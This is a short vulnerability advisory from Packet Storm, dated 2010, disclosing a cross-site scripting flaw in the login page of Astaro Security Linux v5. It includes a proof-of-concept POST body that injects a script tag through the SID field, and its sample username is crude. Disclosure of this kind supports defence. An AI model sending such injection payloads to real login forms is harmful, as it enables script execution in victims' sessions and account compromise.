Astaro Security Linux 5 Cross Site Scripting

2010-03-23T00:00:00
ID PACKETSTORM:87584
Type packetstorm
Reporter Vincent Hautot
Modified 2010-03-23T00:00:00

Description

                                        
                                            `Program : Astaro Security Linux v5  
PoC : XSS  
Homepage : http://www.astaro.com/  
Found by : Vincent Hautot  
Contact : v.hautot () sysdream com  
  
//----- Application description  
  
Astaro Security Linux is a complete network security solution that  
protects organizations against a wide range of threats to security  
and productivity.  
  
  
//----- Description of vulnerability  
  
This Xss was found on index.fpl page in the login form. Usig this flaw  
it is possible to execute Javascript code.  
Posting using multipart/form-data does not work ; use this data instead:  
  
username=my@fucking.mail&password=DTC&SID=>"><script>alert("XSS !!!")</script>  
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0  
  
  
//----- Credits  
  
http://www.sysdream.com/article.php?story_id=326&section_id=78  
  
`